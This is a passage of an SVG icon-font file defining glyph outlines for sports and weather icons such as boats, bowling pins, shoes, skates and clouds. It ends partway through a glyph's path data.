<glyph unicode="&#xeac4;" glyph-name="sailing-boat-water" d="M693.476 224h10.544c70.681 0 127.98 57.451 127.98 128h-320v480h-32v-480h-320c0-28.033 9.010-53.962 24.292-75.047 9.965 4.822 19.991 9.281 30.072 13.361-7.298 8.713-13.073 18.744-16.925 29.685v0h139.971c18.152 1.374 36.404 1.403 54.724 0h402.389c-13.191-37.239-48.741-64-90.526-64h-125.152c39.071-18.425 77.335-28.769 114.632-32v0 0zM832 384l-288 288v-288h288zM752 416h-176v176l176-176zM256 656v0c96 160 192 176 192 176s-32-112-32-256c0-144 32-192 32-192h-288c0 0 0 112 96 272zM268.697 614.111c-73.497-139.504-73.497-198.111-73.497-198.111h208c0 0-19.2 57.879-19.2 160s19.2 199.305 19.2 199.305c0 0-71.691-41.972-134.503-161.193v0zM96 191.991c13.836 10.221 28.847 20.282 44.944 29.888 129.022 76.997 270.126 94.877 410.234 16.066 128.678-72.381 249.158-56.356 355.848 14.473 19.937 13.236 37.673 27.41 52.974 41.57v-42.314c-10.914-8.854-22.684-17.557-35.275-25.916-115.906-76.948-248.908-94.638-389.235-15.704-128.701 72.394-258.077 56.001-378.147-15.654-22.804-13.609-43.3-28.192-61.139-42.753-0.068-0.055-0.136-0.111-0.203-0.166v40.509zM191.334 152.591c114.937 53.286 237.769 58.021 359.844-10.646 111.406-62.666 216.668-59.066 312.156-11.004v-35.491c-100.57-45.867-211.698-46.727-327.844 18.605-116.641 65.61-233.836 58.293-344.156 3.007v35.53z" />
<glyph unicode="&#xeac5;" glyph-name="sailing-boat-water2" d="M693.476 224h10.544c70.681 0 127.98 57.451 127.98 128h-320v480h-32v-480h-320c0-28.033 9.010-53.962 24.292-75.047 117.145 56.689 242.744 63.211 367.553-6.994 48.473-27.266 95.784-41.987 141.632-45.959v0 0zM832 384h-288v288l288-288zM256 656c-96-160-96-272-96-272h288c0 0-32 48-32 192s32 256 32 256c0 0-96-16-192-176v0zM96 159.991c13.836 10.221 28.847 20.282 44.944 29.888 129.022 76.997 270.126 94.877 410.234 16.066 128.678-72.381 249.158-56.356 355.848 14.473 19.937 13.236 37.673 27.41 52.974 41.57v-42.314c-10.914-8.854-22.684-17.557-35.275-25.916-115.906-76.948-248.908-94.638-389.235-15.704-128.701 72.394-258.077 56.001-378.147-15.654-22.804-13.609-43.3-28.192-61.139-42.753-0.068-0.055-0.136-0.111-0.203-0.166v40.509zM191.334 120.591c114.937 53.286 237.769 58.021 359.844-10.646 111.406-62.666 216.668-59.066 312.156-11.004v-35.491c-100.57-45.867-211.698-46.727-327.844 18.605-116.641 65.61-233.836 58.293-344.156 3.007v35.53z" />
<glyph unicode="&#xeac6;" glyph-name="bowling-pins" d="M672.798 512h62.008l1.194 64h-64l0.798-64zM658.419 480c-19.132-33.46-50.419-101.841-50.419-191.234 0-112.766 51.2-192.766 51.2-192.766h89.6c0 0 51.2 79.959 51.2 192.766 0 89.352-31.515 157.762-50.78 191.234h-90.802zM670.057 608h67.912c6.965 53.144 30.032 71.247 30.032 112 0 35.346-30.441 48.648-64 48.648s-64-13.056-64-48.648c0-40.801 23.121-58.481 30.057-112zM288.798 512h62.008l1.194 64h-64l0.798-64zM274.419 480c-19.132-33.46-50.419-101.841-50.419-191.234 0-112.766 51.2-192.766 51.2-192.766h89.6c0 0 51.2 79.959 51.2 192.766 0 89.352-31.515 157.762-50.78 191.234h-90.802zM286.057 608h67.912c6.965 53.144 30.032 71.247 30.032 112 0 35.346-30.441 48.648-64 48.648s-64-13.056-64-48.648c0-40.801 23.121-58.481 30.057-112zM448 288.766c0-128.686-64-224.766-64-224.766h-128c0 0-64 96-64 224.766s64 223.234 64 223.234v64c0 64-32 96-32 144 0 35.593 32 80 96 80s96-44.654 96-80c0-48-32-80-32-144v-64c0.009-0.013 64-94.558 64-223.234v0zM832 288.766c0-128.686-64-224.766-64-224.766h-128c0 0-64 96-64 224.766s64 223.234 64 223.234v64c0 64-32 96-32 144 0 35.593 32 80 96 80s96-44.654 96-80c0-48-32-80-32-144v-64c0.009-0.013 64-94.558 64-223.234v0z" />
<glyph unicode="&#xeac7;" glyph-name="bowling-pins2" d="M640 512v64h128v-64h-128zM622.036 480c-18.931-38.163-46.036-107.436-46.036-191.234 0-128.766 64-224.766 64-224.766h128c0 0 64 96.080 64 224.766 0 83.76-27.114 153.058-46.046 191.234h-163.918zM637.215 608c-7.786 44.155-29.215 72.72-29.215 112 0 35.593 32 80 96 80s96-44.654 96-80c0-39.28-21.429-67.845-29.215-112h-133.569zM256 512v64h128v-64h-128zM238.036 480c-18.931-38.163-46.036-107.436-46.036-191.234 0-128.766 64-224.766 64-224.766h128c0 0 64 96.080 64 224.766 0 83.76-27.114 153.058-46.046 191.234h-163.918zM253.215 608c-7.786 44.155-29.215 72.72-29.215 112 0 35.593 32 80 96 80s96-44.654 96-80c0-39.28-21.429-67.845-29.215-112h-133.569z" />
<glyph unicode="&#xeac8;" glyph-name="bowling-pin-ball" d="M449.24 137.042v0 0c-20.915 28.95-33.24 64.514-33.24 102.958 0 50.629 21.378 96.266 55.6 128.374-10.693 50.318-29.342 88.973-42.38 111.626h-90.802c-19.132-33.46-50.419-101.841-50.419-191.234 0-112.766 51.2-192.766 51.2-192.766h89.6c0 0 9.573 14.95 20.441 41.042zM472.623 110.673c-13.197-29.519-24.623-46.673-24.623-46.673h-128c0 0-64 96-64 224.766s64 223.234 64 223.234v64c0 64-32 96-32 144 0 35.593 32 80 96 80s96-44.654 96-80c0-48-32-80-32-144v-64c0.006-0.009 32.567-48.117 51.237-122.402 26.934 16.737 58.72 26.402 92.763 26.402 97.202 0 176-78.798 176-176s-78.798-176-176-176c-46.070 0-88.006 17.701-119.377 46.673v0 0zM352.798 512h62.008l1.194 64h-64l0.798-64zM350.057 608h67.912c6.965 53.144 30.032 71.247 30.032 112 0 35.346-30.441 48.648-64 48.648s-64-13.056-64-48.648c0-40.801 23.121-58.481 30.057-112zM592 96c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0zM592 320c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM560 256c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM624 256c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xeac9;" glyph-name="bowling-pin-ball2" d="M457.957 80.945c-5.976-10.968-9.957-16.945-9.957-16.945h-128c0 0-64 96-64 224.766 0 83.798 27.105 153.071 46.036 191.234v0h163.918c7.467-15.058 16.208-34.959 24.055-58.679-63.278-35.669-106.010-103.505-106.010-181.321 0-63.805 28.729-120.9 73.957-159.055v0 0zM320 512v64h128v-64h-128zM317.215 608c-7.786 44.155-29.215 72.72-29.215 112 0 35.593 32 80 96 80s96-44.654 96-80c0-39.28-21.429-67.845-29.215-112h-133.569zM592 64v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM592 320c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM560 256c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM624 256c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xeaca;" glyph-name="diving-goggles" d="M512 288v0c0-63.193 0 0 0 0 0-88.134 71.634-160 160-160 88.186 0 160 71.522 160 159.748v544.252h96v-544.125c0-141.255-114.615-255.875-256-255.875-141.097 0-256 114.615-256 256 0 0 0-123.712 0 0h-64v96h224v-96h-64zM864 287.794c0-105.925-86.177-191.794-192-191.794-106.039 0-192 85.964-192 191.906v32.094h64v32h-160v-32h64v-31.905c0-123.764 100.184-224.095 224-224.095 0 0-92.123 0 0 0 123.712 0 224 100.332 224 223.933v352.067h-32v-352.206zM864 672h32v128h-32v-128zM128 592v-15.965c0-88.385 71.491-160.035 159.811-160.035h32.096c17.725 0 40.149 11.507 50.588 26.421l56.832 81.189c20.254 28.934 53.138 28.781 73.21 0l56.622-81.189c10.176-14.592 32.464-26.421 50.579-26.421h32.155c88.424 0 160.106 71.657 160.106 160.035v15.965c0 97.202-79.063 176-175.682 176h-320.635c-97.027 0-175.682-78.996-175.682-176v0zM624.318 736c79.085 0 143.682-64.61 143.682-144v-15.965c0-70.705-57.354-128.035-128.106-128.035h-32.155c-7.5 0-20.052 6.589-24.332 12.726l-56.622 81.189c-32.825 47.067-92.698 47.153-125.673 0.046l-56.832-81.189c-4.367-6.239-16.943-12.772-24.373-12.772h-32.096c-70.614 0-127.811 57.291-127.811 128.035v15.965c0 79.418 64.415 144 143.682 144h320.635z" />
<glyph unicode="&#xeacb;" glyph-name="diving-goggles2" d="M512 288h64v96h-224v-96h64c0-123.712 0 0 0 0 0-141.385 114.903-256 256-256 141.385 0 256 114.62 256 255.875v544.125h-96v-544.252c0-88.227-71.814-159.748-160-159.748-88.366 0-160 71.866-160 160 0 0 0-63.193 0 0v0zM864 672v128h32v-128h-32zM128 592v-15.965c0-88.385 71.491-160.035 159.811-160.035h32.096c17.725 0 40.149 11.507 50.588 26.421l56.832 81.189c20.254 28.934 53.138 28.781 73.21 0l56.622-81.189c10.176-14.592 32.464-26.421 50.579-26.421h32.155c88.424 0 160.106 71.657 160.106 160.035v15.965c0 97.202-79.063 176-175.682 176h-320.635c-97.027 0-175.682-78.996-175.682-176v0zM624.318 736c79.085 0 143.682-64.61 143.682-144v-15.965c0-70.705-57.354-128.035-128.106-128.035h-32.155c-7.5 0-20.052 6.589-24.332 12.726l-56.622 81.189c-32.825 47.067-92.698 47.153-125.673 0.046l-56.832-81.189c-4.367-6.239-16.943-12.772-24.373-12.772h-32.096c-70.614 0-127.811 57.291-127.811 128.035v15.965c0 79.418 64.415 144 143.682 144h320.635zM624.318 704c61.411 0 111.682-50.065 111.682-111.518v-15.896c0-52.8-43.024-95.622-96.106-95.622h-32.155c2.991 0 0.228 1.444 1.915-0.965l-56.622 80.84c-45.541 65.018-132.402 65.143-178.136 0.091l-56.832-80.84c1.627 2.315-1.158 0.874 1.843 0.874h-32.096c-52.929 0-95.811 42.767-95.811 95.622v15.896c0 61.497 50.107 111.518 111.682 111.518h320.635z" />
<glyph unicode="&#xeacc;" glyph-name="sports-shoe" d="M396.8 555.349l16.016-24.617c-4.523-3.516-8.974-6.975-13.355-10.334l-17.437 26.802-26.823-17.451 18.357-28.216c-4.85-3.258-9.612-6.248-14.291-8.897l-18.843 28.963-26.823-17.451 15.212-23.383c-2.971-0.503-5.908-0.767-8.812-0.767-64 0-95.826 0-95.826 0-53.116 0-96.174-43.189-96.174-96.296 0-70.529 57.534-127.704 128.090-127.704h607.795c35.41 0 64.45 28.806 64.273 63.745 0 0 8.775 288.255-64.158 288.255s-64-63.086-160-63.086c-96 0-80 63.086-128 63.086-36.124 0-68.918-13.315-98.921-31.357l-15.668 24.082-26.823-17.451 15.769-24.238c-4.075-2.894-8.096-5.831-12.065-8.785l-14.67 22.549-26.823-17.451zM891.576 460.812c2.437-25.366 3.853-51.553 4.503-76.812h-192.079c-61.359 0-80 0-144.624-8.436-0.77 4.772-2.325 10.111-5.065 15.592-7.621 15.241-22.026 24.845-42.311 24.845h-176c-21.715 0-34.31 8.397-41.689 23.155-1.479 2.959-2.654 5.953-3.568 8.845 7.913 0 17.458 0 29.257 0 9.16 0 18.155 1.471 27.306 4.341l14.091-21.658 26.823 17.451-11.471 17.631c3.941 2.288 7.962 4.789 12.082 7.498 0.724 0.476 1.45 0.958 2.179 1.445l11.987-18.425 26.823 17.451-12.858 19.764c0.692 0.528 1.393 1.064 2.103 1.609 1.519 1.165 6.059 4.684 11.26 8.714l14.272-21.937 26.823 17.451-15.636 24.033c4.12 3.074 8.137 6.004 12.060 8.793l14.541-22.351 26.823 17.451-14.653 22.522c3.389 2.036 6.716 3.947 9.989 5.735l0.754-1.547c0 0 19.508-29.404 35.387-45.283 37.843-37.843 86.793-60.686 147.314-60.686 58.918 0 112.527 15.767 159.77 42.013 12.305 6.836 32.448 20.676 36.134 23.572 3.411-15.597 5.803-33.318 7.672-52.774zM896.51 353.144c0.020-8.656-0.044-17.101-0.181-25.253-0.059-3.524-0.118-5.959-0.155-7.173 0.072-18.244-14.522-32.718-32.288-32.718h-607.795c-28.439 0-54.035 12.374-71.646 32h231.556c45.098 0 76.524 10.443 137.704 21.007 70.296 12.138 113.997 12.138 150.296 12.138h192.51zM165.421 352c-3.51 9.927-5.421 20.598-5.421 31.704 0 35.473 28.771 64.296 64.174 64.296 1.127 0 1.127 0 6.768 0 11.552 0 18.21 0 26.745 0 2.932-10.96 6.541-20.233 8.003-23.155 12.621-25.241 36.026-40.845 70.311-40.845h176c7.715 0 11.31-2.397 13.689-7.155 1.69-3.379 2.311-7.107 2.311-8.845-42.272-11.078-74.434-16-112-16h-250.579zM576 576c4.101 0 5.034-0.573 11.019-7.64-0.421 0.497 8.038-9.754 11.050-13.146 24.883-28.032 55.641-42.3 105.931-42.3 48.712 0 77.005 12.124 109.163 38.983 1.455 1.216 3.636 3.056 6.952 5.85 17.096 14.331 25.458 18.254 43.885 18.254-0.582 0 4.369-5.791 10.582-23.586 3.539-10.139 2.637-6.965 2.637-6.965s-9.599-4.462-10.194-4.912c-10.182-7.687-21.811-15.338-34.795-22.551-42.757-23.754-91.148-37.987-144.23-37.987-51.479 0-92.529 19.157-124.686 51.314-10.215 10.215-25.95 32.045-25.95 32.045l-3.878 5.236c14.41 5.013 28.252 7.405 42.515 7.405z" />
<glyph unicode="&#xeacd;" glyph-name="sports-shoe2" d="M450.358 559.036c-4.075-2.894-8.096-5.831-12.065-8.785v0l33.127-50.918-26.823-17.451-31.781 48.85c-4.523-3.516-8.974-6.975-13.355-10.334l30.36-46.664-26.823-17.451-29.44 45.251c-4.85-3.258-9.612-6.248-14.291-8.897v0l28.954-44.504-26.823-17.451-32.584 50.084c-2.971-0.503-5.908-0.767-8.812-0.767-11.751 0-22.416 0-32 0v0-16c0-5.738 1.621-15.465 6.311-24.845 7.379-14.759 19.974-23.155 41.689-23.155h176c20.285 0 34.69-9.603 42.311-24.845 2.937-5.874 4.513-11.587 5.219-16.612 62.789 10.367 144.47 8.312 144.47 8.312h224.064c-1.102 45.188-4.769 106.114-15.646 153.192l-5.104-3.361c-2.926-2.926-8.264-7.716-15.899-13.744-12.525-9.888-27.109-19.742-43.644-28.928-47.243-26.246-100.852-42.013-159.77-42.013-92.838 0-153.354 50.438-186.851 113.82-1.371 2.594-4.005 9.766-8.773 23.442v0c-5.179-2.714-10.277-5.6-15.297-8.619l32.129-49.385-26.823-17.451-32.028 49.229zM256 480c-21.239 0-31.826 0-31.826 0-53.116 0-96.174-43.189-96.174-96.296 0-10.944 1.385-21.567 3.99-31.704v0h284.010c36.416 0 72.658 7.852 111.996 16.241-0.053 1.825-0.692 5.373-2.307 8.603-2.379 4.759-5.974 7.155-13.689 7.155h-176c-34.285 0-57.69 15.603-70.311 40.845-7.31 14.621-9.689 28.893-9.689 39.155v16zM145.091 320c22.168-38.252 63.651-64 110.999-64h607.795c35.41 0 64.45 28.806 64.273 63.745 0 0 0.38 12.484 0.325 32.255h-224.483c0 0-96 0-150.296-10.993-47.971-9.713-92.606-21.007-137.704-21.007h-270.909zM521.749 598.222c17.217 6.104 35.275 9.778 54.251 9.778 48 0 32-63.086 128-63.086s87.066 63.086 160 63.086c17.1 0 29.709-15.847 38.992-40.109l-15.867-10.578c-4.512-4.073-8.925-8.033-15.539-13.255-11.225-8.862-24.391-17.758-39.356-26.072-42.757-23.754-91.148-37.987-144.23-37.987-78.695 0-130.026 42.782-158.559 96.772-0.287 0.542-3.615 9.742-7.692 21.45v0z" />
<glyph unicode="&#xeace;" glyph-name="soccer-shoe" d="M412.816 530.732c-4.523-3.516-8.974-6.975-13.355-10.334l-17.437 26.802-26.823-17.451 18.357-28.216c-4.85-3.258-9.612-6.248-14.291-8.897l-18.843 28.963-26.823-17.451 15.212-23.383c-2.971-0.503-5.908-0.767-8.812-0.767-64 0-95.826 0-95.826 0-53.116 0-96.174-43.189-96.174-96.296 0-70.529 57.534-127.704 128.090-127.704h63.91v-32h32v32h64.088v-32h31.912v32h64v-32h32v32h64v-32h32v32h64.004l-0.004-32h32v32h64v-32h32v32h31.885c35.41 0 64.45 28.806 64.273 63.745 0 0 8.775 288.255-64.158 288.255s-64-63.086-160-63.086c-96 0-80 63.086-128 63.086-36.124 0-68.918-13.315-98.921-31.357l-15.668 24.082-26.823-17.451 15.769-24.238c-4.075-2.894-8.096-5.831-12.065-8.785l-14.67 22.549-26.823-17.451 16.016-24.617zM891.576 460.812c2.437-25.366 3.853-51.553 4.503-76.812h-192.079c-61.359 0-80 0-144.624-8.436-0.77 4.772-2.325 10.111-5.065 15.592-7.621 15.241-22.026 24.845-42.311 24.845h-176c-21.715 0-34.31 8.397-41.689 23.155-1.479 2.959-2.654 5.953-3.568 8.845 7.913 0 17.458 0 29.257 0 9.16 0 18.155 1.471 27.306 4.341l14.091-21.658 26.823 17.451-11.471 17.631c3.941 2.288 7.962 4.789 12.082 7.498 0.724 0.476 1.45 0.958 2.179 1.445l11.987-18.425 26.823 17.451-12.858 19.764c0.692 0.528 1.393 1.064 2.103 1.609 1.519 1.165 6.059 4.684 11.26 8.714l14.272-21.937 26.823 17.451-15.636 24.033c4.12 3.074 8.137 6.004 12.060 8.793l14.541-22.351 26.823 17.451-14.653 22.522c3.389 2.036 6.716 3.947 9.989 5.735l0.754-1.547c0 0 19.508-29.404 35.387-45.283 37.843-37.843 86.793-60.686 147.314-60.686 58.918 0 112.527 15.767 159.77 42.013 12.305 6.836 32.448 20.676 36.134 23.572 3.411-15.597 5.803-33.318 7.672-52.774zM896.51 353.144c0.020-8.656-0.044-17.101-0.181-25.253-0.059-3.524-0.118-5.959-0.155-7.173 0.072-18.244-14.522-32.718-32.288-32.718h-607.795c-28.439 0-54.035 12.374-71.646 32h231.556c45.098 0 76.524 10.443 137.704 21.007 70.296 12.138 113.997 12.138 150.296 12.138h192.51zM165.421 352c-3.51 9.927-5.421 20.598-5.421 31.704 0 35.473 28.771 64.296 64.174 64.296 1.127 0 1.127 0 6.768 0 11.552 0 18.21 0 26.745 0 2.932-10.96 6.541-20.233 8.003-23.155 12.621-25.241 36.026-40.845 70.311-40.845h176c7.715 0 11.31-2.397 13.689-7.155 1.69-3.379 2.311-7.107 2.311-8.845-42.272-11.078-74.434-16-112-16h-250.579zM576 576c4.101 0 5.034-0.573 11.019-7.64-0.421 0.497 8.038-9.754 11.050-13.146 24.883-28.032 55.641-42.3 105.931-42.3 48.712 0 77.005 12.124 109.163 38.983 1.455 1.216 3.636 3.056 6.952 5.85 17.096 14.331 25.458 18.254 43.885 18.254-0.582 0 4.369-5.791 10.582-23.586 3.539-10.139 2.637-6.965 2.637-6.965s-9.599-4.462-10.194-4.912c-10.182-7.687-21.811-15.338-34.795-22.551-42.757-23.754-91.148-37.987-144.23-37.987-51.479 0-92.529 19.157-124.686 51.314-10.215 10.215-25.95 32.045-25.95 32.045l-3.878 5.236c14.41 5.013 28.252 7.405 42.515 7.405v0z" />
<glyph unicode="&#xeacf;" glyph-name="soccer-shoe2" d="M450.358 559.036c-4.075-2.894-8.096-5.831-12.065-8.785v0l33.127-50.918-26.823-17.451-31.781 48.85c-4.523-3.516-8.974-6.975-13.355-10.334l30.36-46.664-26.823-17.451-29.44 45.251c-4.85-3.258-9.612-6.248-14.291-8.897v0l28.954-44.504-26.823-17.451-32.584 50.084c-2.971-0.503-5.908-0.767-8.812-0.767-11.751 0-22.416 0-32 0v0-16c0-5.738 1.621-15.465 6.311-24.845 7.379-14.759 19.974-23.155 41.689-23.155h176c20.285 0 34.69-9.603 42.311-24.845 2.937-5.874 4.513-11.587 5.219-16.612 62.789 10.367 144.47 8.312 144.47 8.312h224.064c-1.102 45.188-4.769 106.114-15.646 153.192l-5.104-3.361c-2.926-2.926-8.264-7.716-15.899-13.744-12.525-9.888-27.109-19.742-43.644-28.928-47.243-26.246-100.852-42.013-159.77-42.013-92.838 0-153.354 50.438-186.851 113.82-1.371 2.594-4.005 9.766-8.773 23.442v0c-5.179-2.714-10.277-5.6-15.297-8.619l32.129-49.385-26.823-17.451-32.028 49.229zM256 480c-21.239 0-31.826 0-31.826 0-53.116 0-96.174-43.189-96.174-96.296 0-10.944 1.385-21.567 3.99-31.704v0h284.010c36.416 0 72.658 7.852 111.996 16.241-0.053 1.825-0.692 5.373-2.307 8.603-2.379 4.759-5.974 7.155-13.689 7.155h-176c-34.285 0-57.69 15.603-70.311 40.845-7.31 14.621-9.689 28.893-9.689 39.155v16zM145.091 320c22.168-38.252 63.651-64 110.999-64h63.91v-32h32v32h64v-32h32v32h64v-32h32v32h64v-32h32v32h64v-32h32v32h64v-32h32v32h31.885c35.41 0 64.45 28.806 64.273 63.745 0 0 0.38 12.484 0.325 32.255h-224.483c0 0-96 0-150.296-10.993-47.971-9.713-92.606-21.007-137.704-21.007h-270.909zM521.749 598.222c17.217 6.104 35.275 9.778 54.251 9.778 48 0 32-63.086 128-63.086s87.066 63.086 160 63.086c17.1 0 29.709-15.847 38.992-40.109l-15.867-10.578c-4.512-4.073-8.925-8.033-15.539-13.255-11.225-8.862-24.391-17.758-39.356-26.072-42.757-23.754-91.148-37.987-144.23-37.987-78.695 0-130.026 42.782-158.559 96.772-0.287 0.542-3.615 9.742-7.692 21.45v0z" />
<glyph unicode="&#xead0;" glyph-name="ice-skate" d="M412.816 530.732c-4.523-3.516-8.974-6.975-13.355-10.334l-17.437 26.802-26.823-17.451 18.357-28.216c-4.85-3.258-9.612-6.248-14.291-8.897l-18.843 28.963-26.823-17.451 15.212-23.383c-2.971-0.503-5.908-0.767-8.812-0.767-64 0-95.826 0-95.826 0-53.116 0-96.174-43.189-96.174-96.296 0-70.529 57.534-127.704 128.090-127.704h63.91v-64h-160.295c-17.51 0-31.705 14.502-31.705 32h-32c0-35.346 28.37-64 64.189-64h767.969v32h-192.158v64h127.885c35.41 0 64.45 28.806 64.273 63.745 0 0 8.775 288.255-64.158 288.255s-64-63.086-160-63.086c-96 0-80 63.086-128 63.086-36.124 0-68.918-13.315-98.921-31.357l-15.668 24.082-26.823-17.451 15.769-24.238c-4.075-2.894-8.096-5.831-12.065-8.785l-14.67 22.549-26.823-17.451 16.016-24.617zM891.576 460.812c2.437-25.366 3.853-51.553 4.503-76.812h-192.079c-61.359 0-80 0-144.624-8.436-0.77 4.772-2.325 10.111-5.065 15.592-7.621 15.241-22.026 24.845-42.311 24.845h-176c-21.715 0-34.31 8.397-41.689 23.155-1.479 2.959-2.654 5.953-3.568 8.845h29.257c9.16 0 18.155 1.471 27.306 4.341l14.091-21.658 26.823 17.451-11.471 17.631c3.941 2.288 7.962 4.789 12.082 7.498 0.724 0.476 1.45 0.958 2.179 1.445l11.987-18.425 26.823 17.451-12.858 19.764c0.692 0.528 1.393 1.064 2.103 1.609 1.519 1.165 6.059 4.684 11.26 8.714l14.272-21.937 26.823 17.451-15.636 24.033c4.12 3.074 8.137 6.004 12.060 8.793l14.541-22.351 26.823 17.451-14.653 22.522c3.389 2.036 6.716 3.947 9.989 5.735l0.754-1.547c0 0 19.508-29.404 35.387-45.283 37.843-37.843 86.793-60.686 147.314-60.686 58.918 0 112.527 15.767 159.77 42.013 12.305 6.836 32.448 20.676 36.134 23.572 3.411-15.597 5.803-33.318 7.672-52.774v0 0zM896.51 353.144c0.020-8.656-0.044-17.101-0.181-25.253-0.059-3.524-0.118-5.959-0.155-7.173 0.072-18.244-14.522-32.718-32.288-32.718h-607.795c-28.439 0-54.035 12.374-71.646 32h231.556c45.098 0 76.524 10.443 137.704 21.007 70.296 12.138 113.997 12.138 150.296 12.138h192.51zM165.421 352c-3.51 9.927-5.421 20.598-5.421 31.704 0 35.473 28.771 64.296 64.174 64.296h6.768c11.552 0 18.21 0 26.745 0 2.932-10.96 6.541-20.233 8.003-23.155 12.621-25.241 36.026-40.845 70.311-40.845h176c7.715 0 11.31-2.397 13.689-7.155 1.69-3.379 2.311-7.107 2.311-8.845-42.272-11.078-74.434-16-112-16h-250.579zM576 576c4.101 0 5.034-0.573 11.019-7.64-0.421 0.497 8.038-9.754 11.050-13.146 24.883-28.032 55.641-42.3 105.931-42.3 48.712 0 77.005 12.124 109.163 38.983 1.455 1.216 3.636 3.056 6.952 5.85 17.096 14.331 25.458 18.254 43.885 18.254-0.582 0 4.369-5.791 10.582-23.586 3.539-10.139 2.637-6.965 2.637-6.965s-9.599-4.462-10.194-4.912c-10.182-7.687-21.811-15.338-34.795-22.551-42.757-23.754-91.148-37.987-144.23-37.987-51.479 0-92.529 19.157-124.686 51.314-10.215 10.215-25.95 32.045-25.95 32.045l-3.878 5.236c14.41 5.013 28.252 7.405 42.515 7.405v0 0zM352 256h352v-64h-352v64z" />
<glyph unicode="&#xead1;" glyph-name="ice-skate2" d="M320 256v-64h-160c-17.673 0-32 14.502-32 32h-32c0-35.2 28.801-64 65.342-64h766.658v32h-192v64h127.885c35.41 0 64.45 28.806 64.273 63.745 0 0 0.38 12.484 0.325 32.255h-224.483c0 0-96 0-150.296-10.993-47.971-9.713-92.606-21.007-137.704-21.007h-270.909c22.168-38.252 63.651-64 110.999-64h63.91zM352 256h352v-64h-352v64zM450.358 559.036c-4.075-2.894-8.096-5.831-12.065-8.785v0l33.127-50.918-26.823-17.451-31.781 48.85c-4.523-3.516-8.974-6.975-13.355-10.334l30.36-46.664-26.823-17.451-29.44 45.251c-4.85-3.258-9.612-6.248-14.291-8.897v0l28.954-44.504-26.823-17.451-32.584 50.084c-2.971-0.503-5.908-0.767-8.812-0.767h-32v-16c0-5.738 1.621-15.465 6.311-24.845 7.379-14.759 19.974-23.155 41.689-23.155h176c20.285 0 34.69-9.603 42.311-24.845 2.937-5.874 4.513-11.587 5.219-16.612 62.789 10.367 144.47 8.312 144.47 8.312h224.064c-1.102 45.188-4.769 106.114-15.646 153.192l-5.104-3.361c-2.926-2.926-8.264-7.716-15.899-13.744-12.525-9.888-27.109-19.742-43.644-28.928-47.243-26.246-100.852-42.013-159.77-42.013-92.838 0-153.354 50.438-186.851 113.82-1.371 2.594-4.005 9.766-8.773 23.442v0c-5.179-2.714-10.277-5.6-15.297-8.619l32.129-49.385-26.823-17.451-32.028 49.229zM256 480c-21.239 0-31.826 0-31.826 0-53.116 0-96.174-43.189-96.174-96.296 0-10.944 1.385-21.567 3.99-31.704v0h284.010c36.416 0 72.658 7.852 111.996 16.241-0.053 1.825-0.692 5.373-2.307 8.603-2.379 4.759-5.974 7.155-13.689 7.155h-176c-34.285 0-57.69 15.603-70.311 40.845-7.31 14.621-9.689 28.893-9.689 39.155v16zM521.749 598.222c17.217 6.104 35.275 9.778 54.251 9.778 48 0 32-63.086 128-63.086s87.066 63.086 160 63.086c17.1 0 29.709-15.847 38.992-40.109l-15.867-10.578c-4.512-4.073-8.925-8.033-15.539-13.255-11.225-8.862-24.391-17.758-39.356-26.072-42.757-23.754-91.148-37.987-144.23-37.987-78.695 0-130.026 42.782-158.559 96.772-0.287 0.542-3.615 9.742-7.692 21.45v0 0z" />
<glyph unicode="&#xead2;" glyph-name="cloud6" d="M227.232 476.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0zM863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0z" />
<glyph unicode="&#xead3;" glyph-name="cloud7" d="M863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0z" />
<glyph unicode="&#xead4;" glyph-name="cloud-sun" d="M227.232 476.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM798.509 632.988c0.983 7.531 1.491 15.212 1.491 23.012 0 97.202-78.798 176-176 176-70.49 0-131.301-41.44-159.401-101.287v0c-15.648 3.461-31.91 5.287-48.599 5.287-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.826 